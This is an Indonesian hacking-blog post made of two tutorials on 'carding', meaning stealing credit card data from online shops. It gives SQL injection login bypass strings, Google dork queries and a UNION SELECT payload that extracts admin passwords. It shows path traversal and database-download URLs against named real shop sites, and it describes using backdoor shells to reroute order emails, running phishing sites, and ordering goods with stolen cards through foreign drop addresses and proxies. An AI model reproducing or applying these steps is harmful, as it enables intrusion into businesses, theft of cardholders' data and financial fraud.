Tampilkan postingan dengan label Carding. Tampilkan semua postingan
Tampilkan postingan dengan label Carding. Tampilkan semua postingan

Sabtu, 13 November 2010

Carding Tutorial Unrestricted Information

Hello, kembali lagi gwe buad artikel :)

Ini berhubungan dengan carding loh, yang seyogyanya anda udah tau semua dengan apa itu carding. Ini hal yang sangat menarik untuk di bahas dalam masalah ini. Ada beberapa teknik yang perlu anda ketahui tentang bagaimana itu carding.

Pertama, gw akan jelaskan beberapa teknik menarik yang patut anda pelajari.
Udah lom ne gw ceramahnya.. Wkwkwkw.. Oke dah lanjut ya kita mulai, jangan lupa bilang terima kasih banyak sama paman google ya ( search engine yang pasti gw gunain dan menjadi guru dari pembelajaran dalam hal ini ).. Lets Go:

1. Teknik Dengan Menggunakan User & Password Admin Default – SQL Injection Basic

  • Teknik ini menggunakan kelemahan dari SQL Injection String Login, caranya cukup mudah hanya dengan memasukkan code di bawah ini pada user dan password pada login di website store admin. Adapun code user dan password itu diantaranya:
    admin:’ or a=a–
    admin:’ or 1=1–
    user:’ or 1=1–
    admin:’ or 1=1–
    dsb
    Contoh:
    Silakan cari di google keyword: “/shopadmin.asp” or “/adminshop.asp” or “/shopadm.asp” or “/shoppingadmin.asp”
    Misal target :
    http://www.namasitusnya.com/shop/admin/shopadmin.asp
    Silakan masukkan kombinasi kombinasi password yang telah saya sebutkan diatas, klo masuk berarti anda berhasil :)
  • 2. Shopping Order Log – Informasi Log Order di Server

  • Ini sangat mudah untuk di dapatkan, ada berbagai log yang tersimpan di berbagai server. Bisanya dalam bentuk *.log, *.rtf, *.txt, *.xls, dsb. Nah bagaimana mendapatkan informasi ini di web target. Itu tergantung dari imajinasi anda untuk menemukannya. Biasanya ini di server berbasis .cgi, .asp, .php, dsb.
    Contoh:
    Silakan cari di google keyword: “order.txt” or “order.log” or “order.asp” or “order.cgi”
    atau inurl:order filetype:txt / inurl:order filetype:log dsb.
    Misal target:
    http://www.namasitusnya.net/shop/admin/log/order.log
    http://www.namasitusnya.org/shop/order.cgi?dir=./order/order.log
    http://www.namasitusnya.la/shopping/DCShop/orders/orders.txt
    Selamat menemukan :)
  • 3. Database Information – Database Source Location – Database Path

  • Pada bagian ini, kita mendapatkan informasi lokasi database. Sehingga kita bisa mendownload database yang ada di server. Kebanyakan yang include di server .mdb.
    Contoh:
    Silakan cari di google keyword: “*.mdb” or “order.mdb” or “database.mdb”
    atau menggunakan info DB: inurl: ESHOP, Lobby.asp, Proddetail.asp dsb.
    Misal target:
    http://www.namasitusnya.com/shop/shopadmin/database.mdb
    http://www.namasitusnya.org//cgi-bin/eshop/database/order.mdb
    http://www.namasitusnya.com/fpdb/shop.mdb
    http://www.namasitusnya.com/shopping/data/vsproducts.mdb
    Selamat mencari.. ^^
  • 4. SQL Injection Advanced Shop Vulnreabilty

  • Dibagian ini, akan dijelaskan mengenai teknik teknik menngunakan SQL Injection. Menggunakan sedikit kombinasi: union, join, select, update, dsb. Pada tutorial ini, diharapkan anda sudah bisa menggunakan SQL Injection sebelumnya.
    Contoh:
    Silakan Buka Google dgn key: “product_details.php?item_id=” or “products_rss.php” dsb
    http://www.targetnya.com/shop/product_details.php?item_id=13
    Ganti tulisan itu dengan :
    products_rss.php?category_id=1′ UNION SELECT concat(login,char(58)
    ,password),0 FROM va_admins — /*
    jadi : http://www.targetnya.com/shop/products_rss.php?category_id=1
    ‘ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*
    dah kalo ada yang errornya kaya gini :

    DB ERROR 1064

    We are very sorry, but an error has occurred while processing your request. Please try the operation again by either pressing the Refresh button on your browser, or by going back one page using the Back button. If the error persists, please contact our web development team.

    The details of the error are shown below. Please quote this in any correspondance regarding this problem.
    Page URL: http://www.targetnya.com/shop/products_rss.php?category_id=1‘%20UNION
    %20SELECT%20concat(login,char(58),password),0%20FROM%20va_admins%20–%20/*
    Referrer URL:
    Database error: Invalid SQL: SELECT i.item_id, i.item_type_id, i.item_code, i.item_name, i.friendly_url, i.short_description, i.small_image, i.small_image_alt, i.big_image, i.big_image_alt, i.price, i.is_sales, i.sales_price, i.is_points_price, i.points_price, i.buy_link, i.is_sales, i.full_description, i.manufacturer_code, i.issue_date, ic.category_id, c.category_name, c.short_description AS category_short_description, c.full_description AS category_full_description FROM ((va_items i INNER JOIN va_items_categories ic ON i.item_id=ic.item_id AND ic.category_id IN (1′ UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca293929882ad831bf724a2589f1e20)) LEFT JOIN va_categories c ON c.category_id = ic.category_id ) WHERE i.is_showing = 1 GROUP BY i.item_id ORDER BY i.item_order, i.item_id
    MySQL Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ” UNION SELECT concat(login,char(58),password),0 FROM va_admins — /*,Admin:cca2′ at line 1

    Nah klo udah jangan lupa decrypt passwordnya ya :)

    5. Admin Shop Send Mail Order

  • Ini bagian sangat simple, pertama tama anda harus tau dulu database administrator. Biasanya ada di config shop adminnya.
    Contoh:
    Cari target inject di google, sampe dapet, sampe bisa jalanin rshell / c99 / backdoor lainya.
    Misal target:
    http://www.namasitusnya.com/admin/shop/rshellbackdoorloe.php
    Nah, kan udah masuk tuh di shellnya dia. trus cari config filenya sampe ketemu: config.php, db.php, configuration.php, database.php, db.asp, dsb. Trus buka / cat file tersebut sampe ketemu isi confignya seperti:
    var $dbtype = ‘mysql’;
    var $host = ‘localhost’;
    var $user = ‘shop24_admin’;
    var $db = ‘shopsex_site’;
    var $mailer = ‘mail’;
    var $ordermailsendto = ‘ben@netboost.com.au‘;

    Nah pada bagian ini “var $ordermailsendto = ‘ben@netboost.com.au‘;”, di confignya ganti ajah ama email loe, misal di ganti ke: “var $ordermailsendto = ‘carding@gwdapetcarding.com‘;”.
    Nah tinggal tunggu dah tu di email loe hasil ordernya. Simple tapi maknyuz.. Hahaha..

    6. Phising & Scaming

  • Tram.. Inilah yang paling banyak dilakukan oleh orang orang jaman sekarang. Hahaha.. Phising & scaming. Gampang banget ni.. Loe bisa aje bikin situs fake, pura pura jualan. Tapi sebenernya loe ambil data data card dari sang target. Namun ada beberapa syarat yang harus di penuhin. Syaratnya: Loe harus punya domain sendiri yang meyakinkan. Artinya, di halaman depan udah terdaftar trade mark website loe yang bikin si korban percaya bahwa site ini beneran, bukan scam. Coba klo di web inject, kan agak runyam. kebanyakan 90% gagal klo di web hasil inject. Scam & phising udah banyak di jelasin. So u pasti tahu donk gmn caranya.
    Pertama, loe harus download source lengkap untuk scam + phising loe. trus loe install deh di server loe. Hasilnya silakan tunggu di email, soalnya biasanya klo scam set kirimnya ke email sang owner.
  • Nah gitu ajah dech dari gw, selamat berselancar dah..
    Segala tindak tanduk jadi tanggung jawab loe sendiri..

    Jadikanlah ilmu sebagai pembelajaran yang berharga dalam hidup!

    Ini Gw Dedikasikan Buat BINUSHACKER MEMBER & BINUSHACKER FAMILY
    Sahabat dan temen temen gw smuanya.. Yayank gw :)
    Dan loe loe semua yang udah berkunjung ke site ini. “Enjoy & Eat It”
    Jangan lupa doain novel gw cepet selesai ya.. Thanks…

    Buad yang ngopy artikel ini, jgn lupa sertakan nama gwe ye.. Kzkzkz.. Thanks

    ==================== [ EOF ]=======================

    UtuH @ #BINUSHACKER – IRC.DAL.NET

    Carding Tutorial Archive

    Hallow kawan² semua, tidakkah anda tahu seberapa mudahkah anda melakukan hal ini.
    Ini hanya informasi, namun kita perlu untuk mengetahuinya.
    Beberapa yang biasa dilakukan didunia carding ini.


    CGI Store Log

    Disini kamu musti usaha sendiri mencari target nya.
    Langkah-langkah nya :

    1. http://www.cashwells.com/cgi-bin/store/index.cgi?page=Repair_Manuals.htm

    2. Kemudian hapus/delete Repair_Manuals.htm di url/browsing sehingga menjadi http://www.cashwells.com/cgi-bin/store/index.cgi?page=

    3. Masukkan file ini di belakang situs tadi :

    ../admin/files/order.log

    Misal nya http://www.cashwells.com/cgi-bin/store/index.cgi?page=../admin/files/order.log

    4. Maka yang keluar di situs itu adalah nomor CC (credit card).

    Admin Take Over

    Disini kamu musti usaha sendiri mencari target nya.
    Langkah-langkah nya :

    1. http://www.partsupply.in.th/shopadmin.asp

    2. Langkah selanjutnya gunakan teknik SQL Injection

    user : ‘or”=’
    pass : ‘or”=’

    3. Trus kamu buka file2 yang ada disana satu persatu. Dapat deh……. CC yg kita inginkan. Kalo kamu mendapatkan nomor CC (credit card) artinya kamu bernasib baik. Tapi kalo belum ada nomor CC (credit card) disana, artinya kamu belum beruntung. Coba cari lagi target lain.

    Database Downloadable

    Disini kamu musti usaha sendiri mencari target nya.
    Langkah-langkah nya :

    1. http://www.youngsliquors.com/winestore/shopadmin.asp

    2. Kemudian hapus/delete shopadmin.asp di url/browsing sehingga menjadi http://www.youngsliquors.com/winestore/

    3. Masukkan file ini di belakang situs tadi :

    shopdbtest.asp

    Misal nya http://www.youngsliquors.com/winestore/shopdbtest.asp

    4. Trus lihat apa nama databasenya dan letaknya pada : xDatabase dan xDblocation
    contoh :

    xDatabase : shopping300
    xDatabase :../../../../www/youngsliquors/5498761211

    5. Skrg utk mendownload file shopping300 dapat dilakukan dgn merubah url/browsing nya menjadi :

    http://www.youngsliquors.com/winestore/shopping300.mdb

    6. Kalo sudah di download, buka file shopping300.mdb dgn Microsoft Access.

    Metacart

    Disini kamu musti usaha sendiri mencari target nya.
    Langkah-langkah nya :

    1. http://www.imagexpres.com/metacart/moreinfo.asp

    2. Kemudian hapus/delete moreinfo.asp di url/browsing sehingga menjadi http://www.imagexpres.com/metacart/

    3. Masukkan file ini di belakang situs tadi :

    database/metacart.mdb

    Misal nya http://www.imagexpres.com/metacart/database/metacart.mdb

    6. Kalo sudah di download, buka file metacart.mdb dgn Microsoft Access.

    PDshopPro Shopping Cart

    Disini kamu musti usaha sendiri mencari target nya.
    Langkah-langkah nya :

    1. http://www.marktwainbooks.com/shop/category.asp?catid=4

    2. Kemudian hapus/delete shop/category.asp?catid=4 di url/browsing sehingga menjadi http://www.marktwainbooks.com

    3. Masukkan file ini di belakang situs tadi :

    admin/dbsetup.asp

    Misal nya http://www.marktwainbooks.com/admin/dbsetup.asp

    4. Maka yang keluar di situs target adalah :

    Your Database Type :
    Microsoft Access
    Your Connection String :
    Driver={Microsoft Access Driver (*.mdb)}; DBQ=d:\inetpub\marktwainbooks\data\pdshoppro.mdb;
    Current Status :
    Connection to Database OK.
    Database Primary ‘setup’ Table Found!
    Database permissions OK!

    5. Skrg utk mendownload file pdshoppro.mdb dapat dilakukan dgn merubah url/browsing nya menjadi :

    http://www.marktwainbooks.com/data/pdshoppro.mdb

    6. Kalo sudah di download, buka file pdshoppro.mdb dgn Microsoft Access.

    Cara Order Barang

    Sebelum melakukan order barang, kamu musti mempunyai seorang teman di luar negeri (misalnya USA) karna kita akan menggunakan alamat teman kita.
    Jgn harap bisa order ke Indonesia karna Indonesia termasuk dalam daftar “Black List Order”.
    Apabila kamu order barang menggunakan CC (Credit Card) org/pemiliknya asal USA maka sebelum order barang, gunakan proxy USA.
    Begitu pula sebaliknya jika CC org/pemiliknya asal Inggris maka gunakan proxy UK.

    1. Order sebuah Laptop di sebuah situs, misal nya seperti di bawah ini. Lalu klik tab “Add to Cart”

    2. Kemudian masukkan nomor CDW (liat kolom CDW) ke kolom “QuickCart”. Lalu klik tab “Continue to Checkout”

    3. Karna kamu Costumer baru, klik tab “Create Account”

    4. Isilah data-data teman kamu (data di bawah ini adalah palsu).

    5. Isi lagi data-data teman kamu (data di bawah ini adalah palsu).

    6. Pilih salah satu “Shipping Method” nya.

    7. Masukkan data CC (Credit Card) yg kamu dapati dari situs atau teman.

    8. Perhatikan “Shipping Adress” nya. Laptop yg kita beli akan di kirim ke alamat teman kita (data di bawah ini adalah palsu).

    9. Perhatikan lagi “Shipping Adress” nya (data di bawah ini adalah palsu).

    10. Skrg kamu tinggal menunggu kabar dari teman kamu yg di luar negeri (USA) via email/telepon.

    Contoh hasil hasil Tracking Order:
    Thank you for your order.
    (Order Number: 20081221000XX) Payment is now complete.

    Order Number: 20081221000XX
    Total Price: $1153.00

    Products will be sent as soon as dispatch preparations are complete.

    We look forward to serving you again.

    ====================================
    Ini hanya sebuah informasi yang perlu anda ketahui!
    Source from: jambihackerlink[dot]googlepages[dot]com
    ====================================
    Jangan lupa baca juga:
    http://www.binushacker.net/carding-tutorial-unrestricted-information.html